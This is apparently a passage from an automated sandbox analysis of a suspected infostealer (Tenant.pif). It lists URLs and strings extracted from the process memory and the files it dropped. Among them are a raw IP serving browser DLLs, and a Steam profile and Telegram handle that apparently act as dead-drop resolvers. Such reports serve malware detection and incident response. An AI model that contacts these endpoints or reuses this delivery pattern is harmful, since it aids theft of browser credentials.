                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077975968.000000000C51D000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://94.130.188.148
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/freebl3.dll
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/mozglue.dll
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/mozglue.dllq
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/msvcp140.dll
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/msvcp140.dllI
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/nss3.dll
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/nss3.dllKEBKJD-journal
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/softokn3.dll
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/softokn3.dlle
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000278000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/sqlr.dll
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/sqlr.dll1
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/vcruntime140.dll
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/vcruntime140.dllCz
                    Source: Tenant.pif, 0000000B.00000002.4068394882.00000000002BC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148DGI
                    Source: Tenant.pif, 0000000B.00000002.4068394882.00000000002BC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148JKF
                    Source: KEBKJD.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                    Source: KEBKJD.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: KEBKJD.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: KEBKJD.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5iTMW1V3HmVR&a
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=iyaDfxhc
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cii-
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=od0wu57c9_w6&l=e
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                    Source: KEBKJD.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: KEBKJD.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: KEBKJD.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                    Source: CBFCBK.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://mozilla.org0/
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199761128941
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/market/
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: Tenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.0000000001394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941/badges
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941/inventory/
                    Source: Tenant.pif, 0000000B.00000002.4072894428.0000000001394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997611289410
                    Source: Tenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941b
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/about/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/explore/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/legal/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/mobile
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/news/
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/stats/
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: HJKECA.11.drString found in binary or memory: https://support.mozilla.org
                    Source: HJKECA.11.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: HJKECA.11.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                    Source: Tenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/iyigunl
                    Source: Tenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/iyigunlhellosqlr.dllsqlite3.dllIn
